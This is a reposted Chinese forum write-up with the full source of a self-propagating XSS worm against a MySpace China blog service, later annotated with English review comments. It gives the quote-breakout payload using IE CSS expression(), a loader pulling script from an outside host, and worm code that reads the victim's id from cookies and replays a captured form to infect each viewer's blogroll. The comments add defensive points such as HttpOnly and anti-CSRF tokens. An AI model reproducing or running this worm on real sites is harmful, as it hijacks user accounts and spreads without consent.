
[转载]myspace ajax worm

[转载]myspace ajax worm

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
:www.ood.name
目标网址:http://blog.myspace.cn/
在友情链接->管理中,网址字段写回链接属性时没有过滤双引号,可以先用 `"` 闭合属性,再补一个 style 属性,借助 IE 的 CSS expression() 执行 JS(此手法只对 IE 有效;属性名写成 windth 也无妨,IE 对未知属性里的 expression() 同样会求值),形如:

http://x.cn" style="windth:expression(if(window.x!=1){alert(document.cookie);window.x=1;})

如果要加载一个外部 JS,方法很多,但页面加载完成后再调用 document.write 会重写整个文档,导致页面一片空白,只留下我们的 JS,受害者一眼就能察觉。所以要把脚本"追加"进页面而不是重写页面,用下面的方法(动态创建 <script> 节点并插入 <head>):

<script>h=document.createElement('script');h.src='http://xss.cn';k=document.getElementsByTagName('head')[0];k.appendChild(h);</script>

注意 http://xss.cn 这个地址:网址字段有输入长度限制,整个 payload 要尽量短,放外部脚本的域名也要短。完整的代码是:

http://x.cn" style="windth:expression(if(window.x!=1){eval(unescape('h%3Ddocument.createElement%28%27script%27%29%3Bh.src%3D%27http%3A//xss.cn%27%3Bk%3Ddocument.getElementsByTagName%28%27head%27%29%5B0%5D%3Bk.appendChild%28h%29%3B'));window.x=1})

注意复制这段代码的时候不要勾选自动换行。
下面是完整的代码,我没有做打码处理 :P (注意:下面 data 那一长串字符串已经被论坛自动换行拆成了多行,原样复制是语法错误,要先合并回一行;另外 ’ 这类弯引号也要换成普通的 ' 。)

// Entry sequence. Function declarations are hoisted, so `id()` and `check()`
// here resolve to the functions defined further down; after these two lines
// the same names hold the *results* instead (the victim's user id string from
// the cookie, and the indexOf() marker from check()), which is what
// postdata() reads. The functions are unreachable by name afterwards.
var id=id();
var check=check();
function createAjax()
{
    // Build an XHR object, IE-first: the ActiveX "Microsoft.XMLHTTP" control
    // is tried before the standard XMLHttpRequest constructor, and `false`
    // is returned when neither exists. Callers are expected to test the
    // return value before using it (postdata does; check does not).
    var constructors = [
        function () { return new ActiveXObject("Microsoft.XMLHTTP"); },
        function () { return new XMLHttpRequest(); }
    ];
    for (var i = 0; i < constructors.length; i++) {
        try {
            return constructors[i]();
        } catch (err) {
            // constructor missing in this browser; fall through to the next one
        }
    }
    return false;
}
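function check()
{
    // Infection check. Fetch the victim's own blog page with a synchronous
    // GET and look for the marker "x.cn" -- the host of the blogroll link the
    // worm injects. Returns the indexOf() value: -1 means the link is not
    // there yet, i.e. this profile has not been infected.
    // Relies on the script-level `id` (the victim's user id parsed from the
    // cookie) already holding the id string when this runs.
    // NOTE(review): createAjax() can return false; that is not guarded here
    // and would throw on .open(), which simply aborts the whole script.
    var url = "http://blog.myspace.cn/" + id;
    var xmlhttp = createAjax();
    // Fix: the listing used typographic quotes (’get’), which are not valid
    // JS string delimiters and make the whole script a syntax error.
    xmlhttp.open('get', url, false);
    xmlhttp.send();
    var page = xmlhttp.responseText;
    return page.indexOf("x.cn");
}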
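function id()
{
    // Extract the victim's user id from document.cookie. The code assumes a
    // layout of the form `ShutterUser=<id><one separator char>false...`
    // (inferred from the offsets used -- confirm against a real cookie): the
    // id starts right after "ShutterUser=" and ends one character before the
    // literal "false".
    // Returns "" when either marker is missing, instead of the garbage
    // substring the unchecked -1 offsets would otherwise produce.
    // Defensive note: this only works because the cookie is readable from
    // script; an HttpOnly flag on it would stop this extraction.
    var cookie = document.cookie;
    var marker = "ShutterUser=";
    var start = cookie.indexOf(marker);
    var end = cookie.indexOf("false");
    if (start === -1 || end === -1) {
        return "";
    }
    return cookie.substring(start + marker.length, end - 1);
}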
// Propagation step. If check() found no marker in this profile (check == -1,
// i.e. not yet infected), POST the blogroll-management form to add a link
// whose URL carries the same attribute-breakout + expression() payload, so
// anyone viewing this profile in IE gets infected in turn.
// Depends on the script-level `check` and `id` values assigned at the top of
// the script and on createAjax().
function postdata()
{        
        // `check` is the indexOf() result computed at the top of the script.
        if (check == -1) {
// createAjax() returns false when no XHR implementation exists; nothing is sent then.
var xmlhttp = createAjax();
if (xmlhttp) {
// Echo the victim's own UA back (the request goes through their browser anyway).
var useragent = navigator.userAgent;
// The blogroll admin page of the victim's own profile, addressed by id.
var url = "http://blog.myspace.cn/" + id + "/Admin/PageV3/BlogRollMgmt.aspx";
// Form body: the ASP.NET __EVENTTARGET for the "AddLink" button, a captured
// __VIEWSTATE blob, the link title ("baidu") and the URL field holding the
// payload from the write-up, URL-encoded a second time for the form body.
// NOTE(review): the __VIEWSTATE is a fixed value captured from one account
// (it embeds that account's admin URLs). If the server accepts it for every
// victim, ViewState is evidently not bound to the user/session (no
// ViewStateUserKey) and there is no per-request anti-CSRF token -- that, not
// the XSS alone, is what lets a fixed POST body be replayed for everyone.
// NOTE: in this listing the string literal is broken across several physical
// lines by the forum's line wrapping; as printed it is a syntax error and has
// to be re-joined onto one line before it can run.
var data = "__EVENTTARGET=ctl00%24Main%24UC_BlogRollMgmt%24AddLink&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg4Njk0NzQzMA9kFgJmD2QWBGYPZBYGAgUPZBYCZg8WAh4EVGV4dAVe566h55CG5Y%2BL5oOF6ZO%2B5o6lIC0g5aSp5aCC55qE5Y2a5a6iIC0gTXlTcGFjZeiBmuWPiyAtIOaPkOS%2Bm%2BWFjei0ueazqOWGjOeahOS4quS6uuWNmuWuouepuumXtGQCBg8WAh4HY29udGVudAWsAeWkqeWggueah

OWNmuWuoiAtIE15U3BhY2XogZrlj4sgLSDmj5DkvpvlhY3otLnms6jlhoznmoTkuKrkurrljZrlrqLnqbrpl7

TvvIzlubbkuJTljIXmi6zmnInlqLHkuZDmmI7mmJ%2FljZrlrqLjgIHmrYzmiYvljZrlrqLjgIHlkI3kurrljZrlrqLjgIHmg4XmhJ%2FljZrlrqLlkozojYnmoLnljZrlrqLnrYlkAgcPFgIfAQUj5aSp5aCCIE15U3BhY2XljZrlrqIgTXlTcGFjZSzogZrlj4tkAg

IPZBYKAgQPZBYKZg8WAh4FY2xhc3MFC2xpX3NlbGVjdGVkFgJmDxYEHwIFC3N1Ym5hdl9saW5rHgRocm

VmBTVodHRwOi8vYmxvZy5teXNwYWNlLmNuLzEzMTEwNDE3MDgvRW50cnlUaXRsZUxpc3QuYXNwe

GQCAQ8WAh8CBQ1saV9saW5lX2FmdGVyFgJmDxYEHwJlHwMFVGh0dHA6Ly9ibG9nLm15c3BhY2Uu

Y24vMTMxMTA0MTcwOC9BZG1pbi9QYWdlVjMvTWFuYWdlck15RnJpZW5kQmxvZ1Bvc3RUaXRs

ZUxpc3QuYXNweGQCAg8WAh8CZRYCZg8WBB8CZR8DBU9odHRwOi8vYmxvZy5teXNwYWNlLm

NuLzEzMTEwNDE3MDgvQWRtaW4vUGFnZVYzL01hbmFnZXJNeVN1YnNjcmliZVRpdGxlTGlzdC5

hc3B4ZAIDDxYCHwJlFgJmDxYEHwJlHwMFRmh0dHA6Ly9ibG9nLm15c3BhY2UuY24vMTMxMTA0MT

cwOC9BZG1pbi9QYWdlVjMvTWFuYWdlclB1YmxpY2F0aW9uLmFzcHhkAgQPFgIfAmUWAmYPFgQfAm

UfAwVMaHR0cDovL2Jsb2cubXlzcGFjZS5jbi8xMzExMDQxNzA4L0FkbWluL1BhZ2VWMy9NYW5hZ2V

yTXlDb21tZW50X2J5RW50cnkuYXNweGQCBQ9kFgJmDw8WAh4HVmlzaWJsZWhkZAIID2QWAgI

BDxYEHgtfIUl0ZW1Db3VudGYfBGdkAgkPZBYCZg8WBB8FZh8EZ2QCEA9kFgICAQ9kFgICAw8

WAh8EZxYGAgEPFgIfBGdkAgMPFgIfBGdkAgUPDxYCHwRnZGRkwqSmyqXVU3mOlXcCgUO

uhaQlmNg%3D&ctl00%24Main%24UC_BlogRollMgmt%24AddLinkTitleInput=baidu&ctl00%24Main%24UC_BlogRollMgmt%24AddLinkUrlInput=http%3A%2F%2Fx.cn%22+style%3D%22windth%3Aexpression%28if%28window.x%21%3D1%29%7Beval%28unescape%28%27h%253Ddocument.createElement%2528%2527script%2527%2529%253Bh.src%253D%2527http%253A%2F%2Fxss.cn%2527%253Bk%253Ddocument.getElementsByTagName%2528%2527head%2527%2529%255B0%255D%253Bk.appendChild%2528h%2529%253B%27%29%29%3Bwindow.x%3D1%7D%29"
// Asynchronous POST; the handler below is a no-op, the response is never inspected.
xmlhttp.open("post", url, true);
// NOTE(review): these headers look copied verbatim from a captured browser
// request. Several of them (Referer, Accept-Encoding, User-Agent, Host,
// Content-Length, Connection) are ones the browser sets itself; current XHR
// implementations treat them as forbidden and ignore script-set values, so
// which of them actually reached the server in the IE of the time is unclear.
xmlhttp.setRequestHeader("Accept", "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, application/x-silverlight, application/vnd.ms-powerpoint, */*");
xmlhttp.setRequestHeader("Referer", url);
xmlhttp.setRequestHeader("Accept-Language", "zh-cn");
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Accept-Encoding", "gzip, deflate");
xmlhttp.setRequestHeader("User-Agent", useragent);
xmlhttp.setRequestHeader("Host", "blog.myspace.cn");
xmlhttp.setRequestHeader("Content-Length", data.length);
xmlhttp.setRequestHeader("Connection", "Keep-Alive");
xmlhttp.setRequestHeader("Cache-Control", "no-cache");
// Empty completion handler: the worm does not care whether the add succeeded.
xmlhttp.onreadystatechange = function(){
if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
}
}
xmlhttp.send(data);
}
}
// Marker already present (profile already infected): do nothing.
else{}
}
// Kick off the worm. id() and check() already ran at the top of the script,
// so this either posts the infected link into the victim's blogroll or,
// if the marker was found, does nothing.
postdata();

